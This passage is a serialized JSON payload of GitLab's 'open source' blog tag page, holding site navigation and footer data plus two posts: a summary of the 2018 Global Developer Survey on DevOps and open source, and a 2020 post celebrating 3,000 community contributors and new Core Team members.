[{"data":1,"prerenderedAt":5521},["ShallowReactive",2],{"/en-us/blog/tags/open-source/":3,"navigation-en-us":20,"banner-en-us":438,"footer-en-us":453,"open source-tag-page-en-us":664},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"content":8,"config":11,"_id":13,"_type":14,"title":15,"_source":16,"_file":17,"_stem":18,"_extension":19},"/en-us/blog/tags/open-source","tags",false,"",{"tag":9,"tagSlug":10},"open source","open-source",{"template":12},"BlogTag","content:en-us:blog:tags:open-source.yml","yaml","Open Source","content","en-us/blog/tags/open-source.yml","en-us/blog/tags/open-source","yml",{"_path":21,"_dir":22,"_draft":6,"_partial":6,"_locale":7,"data":23,"_id":434,"_type":14,"title":435,"_source":16,"_file":436,"_stem":437,"_extension":19},"/shared/en-us/main-navigation","en-us",{"logo":24,"freeTrial":29,"sales":34,"login":39,"items":44,"search":375,"minimal":406,"duo":425},{"config":25},{"href":26,"dataGaName":27,"dataGaLocation":28},"/","gitlab logo","header",{"text":30,"config":31},"Get free trial",{"href":32,"dataGaName":33,"dataGaLocation":28},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":35,"config":36},"Talk to sales",{"href":37,"dataGaName":38,"dataGaLocation":28},"/sales/","sales",{"text":40,"config":41},"Sign in",{"href":42,"dataGaName":43,"dataGaLocation":28},"https://gitlab.com/users/sign_in/","sign in",[45,89,185,190,296,356],{"text":46,"config":47,"cards":49,"footer":72},"Platform",{"dataNavLevelOne":48},"platform",[50,56,64],{"title":46,"description":51,"link":52},"The most comprehensive AI-powered DevSecOps Platform",{"text":53,"config":54},"Explore our Platform",{"href":55,"dataGaName":48,"dataGaLocation":28},"/platform/",{"title":57,"description":58,"link":59},"GitLab Duo (AI)","Build software faster with AI at every stage of development",{"text":60,"config":61},"Meet GitLab 
Duo",{"href":62,"dataGaName":63,"dataGaLocation":28},"/gitlab-duo/","gitlab duo ai",{"title":65,"description":66,"link":67},"Why GitLab","10 reasons why Enterprises choose GitLab",{"text":68,"config":69},"Learn more",{"href":70,"dataGaName":71,"dataGaLocation":28},"/why-gitlab/","why gitlab",{"title":73,"items":74},"Get started with",[75,80,85],{"text":76,"config":77},"Platform Engineering",{"href":78,"dataGaName":79,"dataGaLocation":28},"/solutions/platform-engineering/","platform engineering",{"text":81,"config":82},"Developer Experience",{"href":83,"dataGaName":84,"dataGaLocation":28},"/developer-experience/","Developer experience",{"text":86,"config":87},"MLOps",{"href":88,"dataGaName":86,"dataGaLocation":28},"/topics/devops/the-role-of-ai-in-devops/",{"text":90,"left":91,"config":92,"link":94,"lists":98,"footer":167},"Product",true,{"dataNavLevelOne":93},"solutions",{"text":95,"config":96},"View all Solutions",{"href":97,"dataGaName":93,"dataGaLocation":28},"/solutions/",[99,124,146],{"title":100,"description":101,"link":102,"items":107},"Automation","CI/CD and automation to accelerate deployment",{"config":103},{"icon":104,"href":105,"dataGaName":106,"dataGaLocation":28},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[108,112,116,120],{"text":109,"config":110},"CI/CD",{"href":111,"dataGaLocation":28,"dataGaName":109},"/solutions/continuous-integration/",{"text":113,"config":114},"AI-Assisted Development",{"href":62,"dataGaLocation":28,"dataGaName":115},"AI assisted development",{"text":117,"config":118},"Source Code Management",{"href":119,"dataGaLocation":28,"dataGaName":117},"/solutions/source-code-management/",{"text":121,"config":122},"Automated Software Delivery",{"href":105,"dataGaLocation":28,"dataGaName":123},"Automated software delivery",{"title":125,"description":126,"link":127,"items":132},"Security","Deliver code faster without compromising 
security",{"config":128},{"href":129,"dataGaName":130,"dataGaLocation":28,"icon":131},"/solutions/security-compliance/","security and compliance","ShieldCheckLight",[133,136,141],{"text":134,"config":135},"Security & Compliance",{"href":129,"dataGaLocation":28,"dataGaName":134},{"text":137,"config":138},"Software Supply Chain Security",{"href":139,"dataGaLocation":28,"dataGaName":140},"/solutions/supply-chain/","Software supply chain security",{"text":142,"config":143},"Compliance & Governance",{"href":144,"dataGaLocation":28,"dataGaName":145},"/solutions/continuous-software-compliance/","Compliance and governance",{"title":147,"link":148,"items":153},"Measurement",{"config":149},{"icon":150,"href":151,"dataGaName":152,"dataGaLocation":28},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[154,158,162],{"text":155,"config":156},"Visibility & Measurement",{"href":151,"dataGaLocation":28,"dataGaName":157},"Visibility and Measurement",{"text":159,"config":160},"Value Stream Management",{"href":161,"dataGaLocation":28,"dataGaName":159},"/solutions/value-stream-management/",{"text":163,"config":164},"Analytics & Insights",{"href":165,"dataGaLocation":28,"dataGaName":166},"/solutions/analytics-and-insights/","Analytics and insights",{"title":168,"items":169},"GitLab for",[170,175,180],{"text":171,"config":172},"Enterprise",{"href":173,"dataGaLocation":28,"dataGaName":174},"/enterprise/","enterprise",{"text":176,"config":177},"Small Business",{"href":178,"dataGaLocation":28,"dataGaName":179},"/small-business/","small business",{"text":181,"config":182},"Public Sector",{"href":183,"dataGaLocation":28,"dataGaName":184},"/solutions/public-sector/","public sector",{"text":186,"config":187},"Pricing",{"href":188,"dataGaName":189,"dataGaLocation":28,"dataNavLevelOne":189},"/pricing/","pricing",{"text":191,"config":192,"link":194,"lists":198,"feature":283},"Resources",{"dataNavLevelOne":193},"resources",{"text":195,"config":196},"View all 
resources",{"href":197,"dataGaName":193,"dataGaLocation":28},"/resources/",[199,232,255],{"title":200,"items":201},"Getting started",[202,207,212,217,222,227],{"text":203,"config":204},"Install",{"href":205,"dataGaName":206,"dataGaLocation":28},"/install/","install",{"text":208,"config":209},"Quick start guides",{"href":210,"dataGaName":211,"dataGaLocation":28},"/get-started/","quick setup checklists",{"text":213,"config":214},"Learn",{"href":215,"dataGaLocation":28,"dataGaName":216},"https://university.gitlab.com/","learn",{"text":218,"config":219},"Product documentation",{"href":220,"dataGaName":221,"dataGaLocation":28},"https://docs.gitlab.com/","product documentation",{"text":223,"config":224},"Best practice videos",{"href":225,"dataGaName":226,"dataGaLocation":28},"/getting-started-videos/","best practice videos",{"text":228,"config":229},"Integrations",{"href":230,"dataGaName":231,"dataGaLocation":28},"/integrations/","integrations",{"title":233,"items":234},"Discover",[235,240,245,250],{"text":236,"config":237},"Customer success stories",{"href":238,"dataGaName":239,"dataGaLocation":28},"/customers/","customer success stories",{"text":241,"config":242},"Blog",{"href":243,"dataGaName":244,"dataGaLocation":28},"/blog/","blog",{"text":246,"config":247},"Remote",{"href":248,"dataGaName":249,"dataGaLocation":28},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":251,"config":252},"TeamOps",{"href":253,"dataGaName":254,"dataGaLocation":28},"/teamops/","teamops",{"title":256,"items":257},"Connect",[258,263,268,273,278],{"text":259,"config":260},"GitLab 
Services",{"href":261,"dataGaName":262,"dataGaLocation":28},"/services/","services",{"text":264,"config":265},"Community",{"href":266,"dataGaName":267,"dataGaLocation":28},"/community/","community",{"text":269,"config":270},"Forum",{"href":271,"dataGaName":272,"dataGaLocation":28},"https://forum.gitlab.com/","forum",{"text":274,"config":275},"Events",{"href":276,"dataGaName":277,"dataGaLocation":28},"/events/","events",{"text":279,"config":280},"Partners",{"href":281,"dataGaName":282,"dataGaLocation":28},"/partners/","partners",{"backgroundColor":284,"textColor":285,"text":286,"image":287,"link":291},"#2f2a6b","#fff","Insights for the future of software development",{"altText":288,"config":289},"the source promo card",{"src":290},"/images/navigation/the-source-promo-card.svg",{"text":292,"config":293},"Read the latest",{"href":294,"dataGaName":295,"dataGaLocation":28},"/the-source/","the source",{"text":297,"config":298,"lists":300},"Company",{"dataNavLevelOne":299},"company",[301],{"items":302},[303,308,314,316,321,326,331,336,341,346,351],{"text":304,"config":305},"About",{"href":306,"dataGaName":307,"dataGaLocation":28},"/company/","about",{"text":309,"config":310,"footerGa":313},"Jobs",{"href":311,"dataGaName":312,"dataGaLocation":28},"/jobs/","jobs",{"dataGaName":312},{"text":274,"config":315},{"href":276,"dataGaName":277,"dataGaLocation":28},{"text":317,"config":318},"Leadership",{"href":319,"dataGaName":320,"dataGaLocation":28},"/company/team/e-group/","leadership",{"text":322,"config":323},"Team",{"href":324,"dataGaName":325,"dataGaLocation":28},"/company/team/","team",{"text":327,"config":328},"Handbook",{"href":329,"dataGaName":330,"dataGaLocation":28},"https://handbook.gitlab.com/","handbook",{"text":332,"config":333},"Investor relations",{"href":334,"dataGaName":335,"dataGaLocation":28},"https://ir.gitlab.com/","investor relations",{"text":337,"config":338},"Trust Center",{"href":339,"dataGaName":340,"dataGaLocation":28},"/security/","trust 
center",{"text":342,"config":343},"AI Transparency Center",{"href":344,"dataGaName":345,"dataGaLocation":28},"/ai-transparency-center/","ai transparency center",{"text":347,"config":348},"Newsletter",{"href":349,"dataGaName":350,"dataGaLocation":28},"/company/contact/","newsletter",{"text":352,"config":353},"Press",{"href":354,"dataGaName":355,"dataGaLocation":28},"/press/","press",{"text":357,"config":358,"lists":359},"Contact us",{"dataNavLevelOne":299},[360],{"items":361},[362,365,370],{"text":35,"config":363},{"href":37,"dataGaName":364,"dataGaLocation":28},"talk to sales",{"text":366,"config":367},"Get help",{"href":368,"dataGaName":369,"dataGaLocation":28},"/support/","get help",{"text":371,"config":372},"Customer portal",{"href":373,"dataGaName":374,"dataGaLocation":28},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":376,"login":377,"suggestions":384},"Close",{"text":378,"link":379},"To search repositories and projects, login to",{"text":380,"config":381},"gitlab.com",{"href":42,"dataGaName":382,"dataGaLocation":383},"search login","search",{"text":385,"default":386},"Suggestions",[387,389,393,395,399,403],{"text":57,"config":388},{"href":62,"dataGaName":57,"dataGaLocation":383},{"text":390,"config":391},"Code Suggestions (AI)",{"href":392,"dataGaName":390,"dataGaLocation":383},"/solutions/code-suggestions/",{"text":109,"config":394},{"href":111,"dataGaName":109,"dataGaLocation":383},{"text":396,"config":397},"GitLab on AWS",{"href":398,"dataGaName":396,"dataGaLocation":383},"/partners/technology-partners/aws/",{"text":400,"config":401},"GitLab on Google Cloud",{"href":402,"dataGaName":400,"dataGaLocation":383},"/partners/technology-partners/google-cloud-platform/",{"text":404,"config":405},"Why GitLab?",{"href":70,"dataGaName":404,"dataGaLocation":383},{"freeTrial":407,"mobileIcon":412,"desktopIcon":417,"secondaryButton":420},{"text":408,"config":409},"Start free 
trial",{"href":410,"dataGaName":33,"dataGaLocation":411},"https://gitlab.com/-/trials/new/","nav",{"altText":413,"config":414},"Gitlab Icon",{"src":415,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-tanuki.svg","gitlab icon",{"altText":413,"config":418},{"src":419,"dataGaName":416,"dataGaLocation":411},"/images/brand/gitlab-logo-type.svg",{"text":421,"config":422},"Get Started",{"href":423,"dataGaName":424,"dataGaLocation":411},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/compare/gitlab-vs-github/","get started",{"freeTrial":426,"mobileIcon":430,"desktopIcon":432},{"text":427,"config":428},"Learn more about GitLab Duo",{"href":62,"dataGaName":429,"dataGaLocation":411},"gitlab duo",{"altText":413,"config":431},{"src":415,"dataGaName":416,"dataGaLocation":411},{"altText":413,"config":433},{"src":419,"dataGaName":416,"dataGaLocation":411},"content:shared:en-us:main-navigation.yml","Main Navigation","shared/en-us/main-navigation.yml","shared/en-us/main-navigation",{"_path":439,"_dir":22,"_draft":6,"_partial":6,"_locale":7,"title":440,"button":441,"image":445,"config":448,"_id":450,"_type":14,"_source":16,"_file":451,"_stem":452,"_extension":19},"/shared/en-us/banner","is now in public beta!",{"text":68,"config":442},{"href":443,"dataGaName":444,"dataGaLocation":28},"/gitlab-duo/agent-platform/","duo banner",{"config":446},{"src":447},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1753720689/somrf9zaunk0xlt7ne4x.svg",{"layout":449},"release","content:shared:en-us:banner.yml","shared/en-us/banner.yml","shared/en-us/banner",{"_path":454,"_dir":22,"_draft":6,"_partial":6,"_locale":7,"data":455,"_id":660,"_type":14,"title":661,"_source":16,"_file":662,"_stem":663,"_extension":19},"/shared/en-us/main-footer",{"text":456,"source":457,"edit":463,"contribute":468,"config":473,"items":478,"minimal":652},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under 
license",{"text":458,"config":459},"View page source",{"href":460,"dataGaName":461,"dataGaLocation":462},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":464,"config":465},"Edit this page",{"href":466,"dataGaName":467,"dataGaLocation":462},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":469,"config":470},"Please contribute",{"href":471,"dataGaName":472,"dataGaLocation":462},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":474,"facebook":475,"youtube":476,"linkedin":477},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[479,502,559,588,622],{"title":46,"links":480,"subMenu":485},[481],{"text":482,"config":483},"DevSecOps platform",{"href":55,"dataGaName":484,"dataGaLocation":462},"devsecops platform",[486],{"title":186,"links":487},[488,492,497],{"text":489,"config":490},"View plans",{"href":188,"dataGaName":491,"dataGaLocation":462},"view plans",{"text":493,"config":494},"Why Premium?",{"href":495,"dataGaName":496,"dataGaLocation":462},"/pricing/premium/","why premium",{"text":498,"config":499},"Why Ultimate?",{"href":500,"dataGaName":501,"dataGaLocation":462},"/pricing/ultimate/","why ultimate",{"title":503,"links":504},"Solutions",[505,510,513,515,520,525,529,532,536,541,543,546,549,554],{"text":506,"config":507},"Digital transformation",{"href":508,"dataGaName":509,"dataGaLocation":462},"/topics/digital-transformation/","digital transformation",{"text":134,"config":511},{"href":129,"dataGaName":512,"dataGaLocation":462},"security & compliance",{"text":123,"config":514},{"href":105,"dataGaName":106,"dataGaLocation":462},{"text":516,"config":517},"Agile 
development",{"href":518,"dataGaName":519,"dataGaLocation":462},"/solutions/agile-delivery/","agile delivery",{"text":521,"config":522},"Cloud transformation",{"href":523,"dataGaName":524,"dataGaLocation":462},"/topics/cloud-native/","cloud transformation",{"text":526,"config":527},"SCM",{"href":119,"dataGaName":528,"dataGaLocation":462},"source code management",{"text":109,"config":530},{"href":111,"dataGaName":531,"dataGaLocation":462},"continuous integration & delivery",{"text":533,"config":534},"Value stream management",{"href":161,"dataGaName":535,"dataGaLocation":462},"value stream management",{"text":537,"config":538},"GitOps",{"href":539,"dataGaName":540,"dataGaLocation":462},"/solutions/gitops/","gitops",{"text":171,"config":542},{"href":173,"dataGaName":174,"dataGaLocation":462},{"text":544,"config":545},"Small business",{"href":178,"dataGaName":179,"dataGaLocation":462},{"text":547,"config":548},"Public sector",{"href":183,"dataGaName":184,"dataGaLocation":462},{"text":550,"config":551},"Education",{"href":552,"dataGaName":553,"dataGaLocation":462},"/solutions/education/","education",{"text":555,"config":556},"Financial services",{"href":557,"dataGaName":558,"dataGaLocation":462},"/solutions/finance/","financial 
services",{"title":191,"links":560},[561,563,565,567,570,572,574,576,578,580,582,584,586],{"text":203,"config":562},{"href":205,"dataGaName":206,"dataGaLocation":462},{"text":208,"config":564},{"href":210,"dataGaName":211,"dataGaLocation":462},{"text":213,"config":566},{"href":215,"dataGaName":216,"dataGaLocation":462},{"text":218,"config":568},{"href":220,"dataGaName":569,"dataGaLocation":462},"docs",{"text":241,"config":571},{"href":243,"dataGaName":244,"dataGaLocation":462},{"text":236,"config":573},{"href":238,"dataGaName":239,"dataGaLocation":462},{"text":246,"config":575},{"href":248,"dataGaName":249,"dataGaLocation":462},{"text":259,"config":577},{"href":261,"dataGaName":262,"dataGaLocation":462},{"text":251,"config":579},{"href":253,"dataGaName":254,"dataGaLocation":462},{"text":264,"config":581},{"href":266,"dataGaName":267,"dataGaLocation":462},{"text":269,"config":583},{"href":271,"dataGaName":272,"dataGaLocation":462},{"text":274,"config":585},{"href":276,"dataGaName":277,"dataGaLocation":462},{"text":279,"config":587},{"href":281,"dataGaName":282,"dataGaLocation":462},{"title":297,"links":589},[590,592,594,596,598,600,602,606,611,613,615,617],{"text":304,"config":591},{"href":306,"dataGaName":299,"dataGaLocation":462},{"text":309,"config":593},{"href":311,"dataGaName":312,"dataGaLocation":462},{"text":317,"config":595},{"href":319,"dataGaName":320,"dataGaLocation":462},{"text":322,"config":597},{"href":324,"dataGaName":325,"dataGaLocation":462},{"text":327,"config":599},{"href":329,"dataGaName":330,"dataGaLocation":462},{"text":332,"config":601},{"href":334,"dataGaName":335,"dataGaLocation":462},{"text":603,"config":604},"Sustainability",{"href":605,"dataGaName":603,"dataGaLocation":462},"/sustainability/",{"text":607,"config":608},"Diversity, inclusion and belonging (DIB)",{"href":609,"dataGaName":610,"dataGaLocation":462},"/diversity-inclusion-belonging/","Diversity, inclusion and 
belonging",{"text":337,"config":612},{"href":339,"dataGaName":340,"dataGaLocation":462},{"text":347,"config":614},{"href":349,"dataGaName":350,"dataGaLocation":462},{"text":352,"config":616},{"href":354,"dataGaName":355,"dataGaLocation":462},{"text":618,"config":619},"Modern Slavery Transparency Statement",{"href":620,"dataGaName":621,"dataGaLocation":462},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":623,"links":624},"Contact Us",[625,628,630,632,637,642,647],{"text":626,"config":627},"Contact an expert",{"href":37,"dataGaName":38,"dataGaLocation":462},{"text":366,"config":629},{"href":368,"dataGaName":369,"dataGaLocation":462},{"text":371,"config":631},{"href":373,"dataGaName":374,"dataGaLocation":462},{"text":633,"config":634},"Status",{"href":635,"dataGaName":636,"dataGaLocation":462},"https://status.gitlab.com/","status",{"text":638,"config":639},"Terms of use",{"href":640,"dataGaName":641,"dataGaLocation":462},"/terms/","terms of use",{"text":643,"config":644},"Privacy statement",{"href":645,"dataGaName":646,"dataGaLocation":462},"/privacy/","privacy statement",{"text":648,"config":649},"Cookie preferences",{"dataGaName":650,"dataGaLocation":462,"id":651,"isOneTrustButton":91},"cookie preferences","ot-sdk-btn",{"items":653},[654,656,658],{"text":638,"config":655},{"href":640,"dataGaName":641,"dataGaLocation":462},{"text":643,"config":657},{"href":645,"dataGaName":646,"dataGaLocation":462},{"text":648,"config":659},{"dataGaName":650,"dataGaLocation":462,"id":651,"isOneTrustButton":91},"content:shared:en-us:main-footer.yml","Main 
Footer","shared/en-us/main-footer.yml","shared/en-us/main-footer",{"allPosts":665,"featuredPost":5500,"totalPagesCount":5519,"initialPosts":5520},[666,694,715,737,760,787,810,830,852,874,895,917,938,960,981,1002,1022,1045,1064,1085,1106,1127,1148,1167,1187,1206,1226,1245,1263,1283,1302,1322,1343,1362,1383,1402,1421,1442,1462,1482,1503,1522,1540,1558,1576,1594,1612,1630,1648,1669,1689,1710,1728,1748,1768,1788,1809,1829,1850,1869,1887,1906,1926,1945,1964,1983,2003,2023,2042,2061,2082,2101,2121,2139,2159,2179,2198,2218,2240,2260,2278,2298,2318,2337,2357,2375,2396,2417,2437,2457,2475,2493,2511,2531,2551,2570,2590,2609,2628,2646,2667,2686,2705,2725,2744,2763,2783,2803,2822,2842,2860,2880,2899,2919,2940,2960,2979,2999,3019,3039,3058,3077,3098,3117,3137,3157,3176,3195,3215,3235,3256,3276,3295,3315,3334,3354,3374,3392,3413,3433,3452,3472,3490,3509,3528,3546,3565,3584,3605,3625,3644,3664,3684,3704,3723,3743,3764,3781,3800,3820,3839,3858,3877,3896,3915,3935,3954,3973,3992,4012,4029,4049,4069,4088,4107,4126,4149,4168,4187,4206,4225,4243,4263,4283,4302,4322,4342,4361,4381,4401,4421,4440,4458,4475,4493,4510,4528,4546,4565,4584,4604,4624,4642,4661,4682,4700,4721,4739,4757,4776,4795,4815,4833,4852,4873,4893,4912,4931,4950,4970,4990,5008,5027,5046,5064,5084,5104,5122,5142,5160,5178,5197,5218,5237,5256,5276,5295,5314,5332,5351,5369,5388,5407,5426,5444,5463,5481],{"_path":667,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":668,"content":676,"config":687,"_id":690,"_type":14,"title":691,"_source":16,"_file":692,"_stem":693,"_extension":19},"/en-us/blog/2018-global-developer-report",{"title":669,"description":670,"ogTitle":669,"ogDescription":670,"noIndex":6,"ogImage":671,"ogUrl":672,"ogSiteName":673,"ogType":674,"canonicalUrls":672,"schema":675},"Global Developer Report - 2018 for Open Source & DevOps","We surveyed over 5,000 software professionals to examine current attitudes and perception of the state of culture, workflow, and tooling within IT 
organizations.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663993/Blog/Hero%20Images/2018-developer-report-cover.jpg","https://about.gitlab.com/blog/2018-global-developer-report","https://about.gitlab.com","article","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Global Developer Report confirms 2018 is the year for open source and DevOps\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Erica Lindberg\"}],\n        \"datePublished\": \"2018-03-07\"\n      }",{"title":677,"description":670,"authors":678,"heroImage":671,"date":680,"body":681,"category":682,"tags":683},"Global Developer Report confirms 2018 is the year for open source and DevOps",[679],"Erica Lindberg","2018-03-07","\n_Our [2022 Global DevSecOps Survey](https://about.gitlab.com/developer-survey/previous/2022/) is out now! Learn the latest in DevOps insights from over 5,000 DevOps professionals._\n\nFrom the junior developer with just a handful of years’ experience to the software professional who’s been in the game for decades, we set out to see how the people behind the software are dealing with a rapidly changing technology landscape. This year’s survey reveals that unclear direction is a developer’s greatest challenge, IT managers are investing the most in continuous integration and delivery, and nearly all agree that the importance of open source cannot be overstated.\n\n\u003C!--more -->\n\nThe focus of [GitLab’s 2018 Global Developer survey](/developer-survey/previous/2018/) was to understand developers’ attitudes toward their workplace, uncover disparities between developers and their management, and benchmark the state of culture, workflow, and tooling within IT organizations. 
We asked a broad set of questions covering everything from developers’ opinions on their teams’ ability to collaborate and succeed at work to their preferences on workflow methodology and tooling.\n\n\u003Cdiv style=\"text-align: center\"> 🎙\u003Cstrong>\u003Ca href=\"https://webinars.devops.com/top-5-takeaways-from-the-2018-global-developer-survey\"> Join us March 29 for a live discussion with Alan Shimel of DevOps.com on the top 5 takeaways from the report\u003C/a> \u003C/strong> 🎙 ️\u003C/div>\n\n## Developer satisfaction\n\nWe found that the majority of developers are satisfied with the conditions of their workplace, and managers should focus on improving the planning and testing phases of the development lifecycle. We also found that IT management is more optimistic in their perception of overall workplace satisfaction with roughly 10 percent more respondents agreeing their team is set up to succeed, and that project requirements and deadlines are set up front.\n\n\u003Cimg src=\"/images/blogimages/2018-developer-report-stats_2x.jpg\" alt=\"2018 Developer Report\" style=\"width: 900px;\"/>\n\nDelays during the planning phase emerged as a top challenge for all respondents and unclear direction remains the greatest challenge to getting work done for developers.\n\n## DevOps\n\nCommitment to and demand for DevOps is growing, despite challenges posed by outmoded tooling and cultural resistance to change. Adoption is still in early stages, with 23 percent identifying DevOps as their development methodology, but this is sure to increase with IT management naming it as one of their top three areas for technology investment in 2018. The tide of developer opinion is following suit: we found that the majority of developers agree that a DevOps workflow saves valuable time during the development process. 
Teams currently practicing DevOps confirm the productivity gains – high performers, who told us they deploy their code on demand, and who estimated that they spend 50 percent or more of their time on new work, report having a clear DevOps culture at rates more than double that of lower-performing teams.\n\n## Open source\n\nOpen source projects like [Kubernetes](/blog/containers-kubernetes-basics/) and [CoreOS](/blog/coreos-acquisition/) have gained a lot of recent attention and this year’s survey underscores the value of creating software in the open. 92 percent of total respondents agree that open source tools are important to software innovation and nearly 50 percent report that most of their tools are open source.\n\n## About the 2018 survey\n\nGitLab surveyed 5,296 software professionals of varying backgrounds and industries around the world. The margin of error is two percent, assuming a population size of 21 million software professionals and 99 percent confidence level.\n\n## Methodology\n\nWe launched this Global Developer Survey on November 17, 2017, collecting responses\nuntil December 18, 2017. During that time, we promoted the survey primarily on GitLab’s\nsocial media channels and newsletter. In order to correct for the gender imbalance\ndeveloping in our survey sample, we made an extra push via Twitter on December 5 to encourage\nwomen involved in the software development lifecycle to take the survey. By the end of the open\nperiod, we achieved approximately 25 percent female respondents, the same percentage of women who currently\nhold computing roles, according to [NCWIT](https://www.ncwit.org/sites/default/files/resources/womenintech_facts_fullreport_05132016.pdf).\n\n| Frequently asked questions |\n| -------- | -------- |\n| **How can I access the report?**   | You can view the complete report [here](/developer-survey/).   
|\n| **Are the raw results publicly available?**  | Yes, you can view the raw data [here](https://www.surveymonkey.com/results/SM-G3S6S63P8/).   |\n| **Did only GitLab users take the survey?** | No, it was open to all who work in software production. You can view the survey demographics [here](/developer-survey/).  |\n| **How can I ask questions or give feedback about the survey and results?** | You can direct questions or comments about the survey to [surveys@gitlab.com](mailto:surveys@gitlab.com). |\n| **I’d like to participate in the next survey. Can I sign up for alerts?** | The best way to receive news about the Global Developer Survey is to sign up for our bi-weekly newsletter – you can do that below or visit our [Subscription Center](https://page.gitlab.com/SubscriptionCenter.html). |\n","insights",[684,9,685,686],"developer survey","DevOps","workflow",{"slug":688,"featured":6,"template":689},"2018-global-developer-report","BlogPost","content:en-us:blog:2018-global-developer-report.yml","2018 Global Developer Report","en-us/blog/2018-global-developer-report.yml","en-us/blog/2018-global-developer-report",{"_path":695,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":696,"content":702,"config":709,"_id":711,"_type":14,"title":712,"_source":16,"_file":713,"_stem":714,"_extension":19},"/en-us/blog/3000-contributors-post",{"title":697,"description":698,"ogTitle":697,"ogDescription":698,"noIndex":6,"ogImage":699,"ogUrl":700,"ogSiteName":673,"ogType":674,"canonicalUrls":700,"schema":701},"Celebrating 3,000 wider community contributors","We've reached an important contributor milestone and added two new members to the Core Team.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678450/Blog/Hero%20Images/blog-header-3000-contributors.png","https://about.gitlab.com/blog/3000-contributors-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating 3,000 wider 
community contributors\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-06-23\"\n      }",{"title":697,"description":698,"authors":703,"heroImage":699,"date":705,"body":706,"category":10,"tags":707},[704],"Ray Paik","2020-06-23","\nLike many open source projects, we have a [community dashboard](https://contributors.gitlab.com) at GitLab and one of the metrics that a few of us were occasionally checking on was the number of **Contributors**. This is the number of wider community members who had merge requests (MRs) merged with the `Community contribution` label across all projects at GitLab. There were some virtual high fives a few weeks ago when the number crossed the 3,000 threshold. There is probably a tendency to place oversized importance on nice round numbers, because if you really think about it the GitLab community wasn't any different at 2,999 vs. 3,000 contributors. However, it was a great occasion to celebrate the continued growth of the wider GitLab community.  \n\n![Community dashboard screenshot](https://about.gitlab.com/images/blogimages/3000-contributors/dashboard-screenshot.png){: .shadow.medium.center}\nCommunity dashboard screenshot from April 23, 2020\n{: .note.text-center}\n\nThe past few months have been a challenging time due to Covid-19, and there was talk in open source circles about the pandemic's potential impact on contributions to open source projects. As people were trying to sort out many new challenges in life, it was reasonable to expect that open source contributions might fall lower on the list of priorities. We actually did see a decline in wider community contributions during the last few weeks of March (125 MRs submitted) compared to the previous two weeks (143 MRs submitted). 
However, the GitLab community seemed to roar back relatively quickly, and the best evidence of that is from our most recent [Hackathon](/community/hackathon/) when my inbox got inundated with [240 MRs submitted](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/35#merge-request-list) over two days. \n\nFirst and foremost, I'm very glad most of the wider community members are doing ok and adjusting to the strange new normal. Moreover, I am grateful that new people are continuing to join and helping to grow the GitLab community with their contributions and enthusiasm even during these challenging times. \n\nWhat all these contributors bring are not just MRs but more importantly valuable feedback and insight that help us improve our product and the community. Some of you may have seen our latest [2020 Global DevSecOps Survey results](/developer-survey/), and one figure that caught my attention was that more than 17% of the respondents actually contribute to GitLab. I hope to see that trend continue.\n\n## Exciting additions to the Core Team\n\nMany of you may already be familiar with the [GitLab Core Team](/community/core-team/), but if not, Core Team members are community members who made sustained contribution to GitLab over the years and serve as representatives of the wider contributor community. In keeping with the growth in contributor numbers, I'm happy to report that we are also adding to the GitLab Core Team. \n\nFrom the wider community, I'm excited to introduce [Lee Tickett](https://gitlab.com/leetickett) as a new Core Team member. If you ever posted a question in the [Contributors room on Gitter](https://gitter.im/gitlab/contributors), Lee may have been one of the first to help with your question. 
Lee has also been very active with [code contributions](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=all&author_username=leetickett) and participating in [issues](https://gitlab.com/groups/gitlab-org/-/issues?scope=all&utf8=%E2%9C%93&state=all&author_username=leetickett). Lee's contribution to GitLab as someone who's been using GitLab for his own company since 2017 has been extremely valuable. When Lee isn't working, contributing, sleeping or eating, you'll likely find him spending time with his family or kicking back in his home bar with some Pac-Man, a game of pool and an ice cold pint.\n\nThe Core Team also includes up to two GitLab team members, and I'm very happy to have [Natalia Tepluhina](/company/team/#ntepluhina) joining as the first female member in the history of the GitLab Core Team. If you submitted frontend related MRs, there's a good chance that Natalia [reviewed and merged your MRs](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&label_name[]=Community%20contribution&assignee_username=ntepluhina). Natalia is also a Core Team member in the Vue.js community and brings a wealth of experience from other open source projects. If you want to meet Natalia in person, she is a frequent speaker at Vue.js events around the world and other Javascript conferences such as [JSHeroes](https://jsheroes.io/) and [JSNation](https://jsnation.com/). 
